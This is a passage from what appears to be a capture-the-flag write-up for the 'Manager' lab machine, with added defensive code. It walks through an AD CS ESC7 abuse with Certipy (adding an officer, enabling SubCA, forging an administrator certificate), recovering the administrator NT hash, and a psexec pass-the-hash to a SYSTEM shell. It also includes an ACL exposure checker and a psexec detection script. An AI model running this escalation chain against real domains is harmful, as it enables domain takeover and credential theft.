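            ace_type, rights, principal, sid = m.groups()
            aces.append({"type": ace_type,
                         "rights": {r.strip() for r in rights.split(",")},
                         "principal": principal.strip(), "sid": sid})
    return aces


def is_privileged(sid):
    """True for BUILTIN\\Administrators, Domain Admins and Enterprise Admins."""
    return sid in PRIVILEGED_SIDS or sid.rsplit("-", 1)[-1] in PRIVILEGED_RIDS


def esc7_exposures(aces):
    """Effective dangerous rights per non-privileged principal: Allow minus
    Deny (a Deny ACE takes precedence over an Allow for the same SID)."""
    allowed, denied, names = {}, {}, {}
    for ace in aces:
        bucket = allowed if ace["type"] == "Allow" else denied
        bucket.setdefault(ace["sid"], set()).update(ace["rights"] & DANGEROUS_RIGHTS)
        names[ace["sid"]] = ace["principal"]
    exposures = []
    for sid, rights in allowed.items():
        effective = rights - denied.get(sid, set())
        if effective and not is_privileged(sid):
            exposures.append((names[sid], sorted(effective)))
    return exposures


if __name__ == "__main__":
    for principal, rights in esc7_exposures(parse_ca_acl(SAMPLE_CERTIFY_OUTPUT)):
        print(f"ESC7: {principal} holds {', '.join(rights)} on the CA")
```

Remediation is to strip ManageCA/ManageCertificates from anything outside the admin groups; the officer and template changes such a principal makes are recorded by Certificate Services auditing (events 4882 and 4890 when CA permissions or certificate manager settings change), which is worth alerting on.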

I notice there is a template named SubCA, so it may be vulnerable to ESC7, as explained on the certipy page. We follow the instructions from that page.

Using Certipy we try to work with the certificates to perform the privilege escalation:

❯ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
❯ certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
❯ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate

but when I request the certificate, it fails…

❯ certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

even though, as we can see, the -issue-request parameter takes the request ID, which is 13 in my case (it may differ in yours), as shown in the commands just above.

However, if I run all the commands again, but this time chained on a single line, it does work:

❯ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' && certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' && certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb && certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 13


Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'

Finally, I try to use this certificate to obtain the administrator user's hash:

❯ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

but I get an error: KRB_AP_ERR_SKEW(Clock skew too great)

Info

If you get this error, you should synchronize your clock with the Kerberos service by running the following command on your machine:

sudo ntpdate -u manager.htb

Right after synchronizing the time, I run:

❯ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

and this time it works.

Warning
If this fails again, keep updating/synchronizing the time with Kerberos using the command shown above until it works… What really matters here is having already obtained the administrator.pfx file.

Since we obtained a hash and, in addition, the SMB service is running on the machine, we can try a Pass The Hash using psexec.py:

❯ rlwrap python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef administrator@manager.htb cmd.exe

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on manager.htb.....
[*] Found writable share ADMIN$
[*] Uploading file prIDvUQr.exe
[*] Opening SVCManager on manager.htb.....
[*] Creating service fldL on manager.htb.....
[*] Starting service fldL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

where, finally, we can get the flag on the Administrator user's Desktop.
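The psexec.py output above shows the two host artefacts this technique cannot avoid: a random-named executable written to ADMIN$ and, seconds later, a new service whose binary is that file. The correlation below is an added example, not part of the writeup; it joins Security event 5145 (share object access) with System event 7045 (service installed) over constructed sample events, with 10.10.14.5 and 10.10.11.50 as made-up addresses.

```python
"""Correlate an ADMIN$/C$ write (Security 5145) with a service install of
the same binary (System 7045), the footprint psexec.py leaves behind."""
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

ATTACKER = "10.10.14.5"   # constructed address
T0 = datetime(2024, 3, 12, 1, 30)

# Constructed sample events, not real logs.  5145 fields mirror ShareName,
# RelativeTargetName, Accesses and IpAddress; 7045 mirrors ServiceName and
# ImagePath.  Names prIDvUQr.exe / fldL are the ones psexec.py printed above.
SAMPLE_EVENTS = [
    {"id": 5145, "ts": T0, "share": "\\\\*\\ADMIN$", "target": "prIDvUQr.exe",
     "accesses": {"WriteData"}, "src": ATTACKER},
    {"id": 7045, "ts": T0 + timedelta(seconds=2), "service": "fldL",
     "path": "%SystemRoot%\\prIDvUQr.exe", "start": "demand"},
    # Benign: a deployment installing Sysmon with no preceding share write.
    {"id": 7045, "ts": T0 + timedelta(minutes=10), "service": "Sysmon64",
     "path": "C:\\Windows\\Sysmon64.exe", "start": "auto"},
    # Benign: an admin copying a script over ADMIN$ without installing a service.
    {"id": 5145, "ts": T0 + timedelta(minutes=20), "share": "\\\\*\\ADMIN$",
     "target": "Temp\\fix.ps1", "accesses": {"WriteData"}, "src": "10.10.11.50"},
]


def _basename(path):
    """Case-folded file name from an ImagePath or RelativeTargetName."""
    return PureWindowsPath(path.strip('"')).name.lower()


def detect_remote_service_drops(events, window=timedelta(minutes=5)):
    """Flag every 7045 whose binary was written to ADMIN$ or C$ from a remote
    host within `window` before the service was installed."""
    writes = [e for e in events if e["id"] == 5145 and "WriteData" in e["accesses"]
              and e["share"].split("\\")[-1].upper() in {"ADMIN$", "C$"}]
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        exe = _basename(svc["path"])
        for w in writes:
            gap = svc["ts"] - w["ts"]
            if _basename(w["target"]) == exe and timedelta(0) <= gap <= window:
                alerts.append({"service": svc["service"], "binary": exe,
                               "src": w["src"], "delay_s": int(gap.total_seconds())})
    return alerts


if __name__ == "__main__":
    for a in detect_remote_service_drops(SAMPLE_EVENTS):
        print(f"service {a['service']} installed from {a['binary']} "
              f"written by {a['src']} {a['delay_s']}s earlier")
```

Event 5145 requires "Audit Detailed File Share" to be enabled on the host; without it, fall back to the 7045 alone and alert on service binaries dropped directly under the Windows directory.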

~Happy Hacking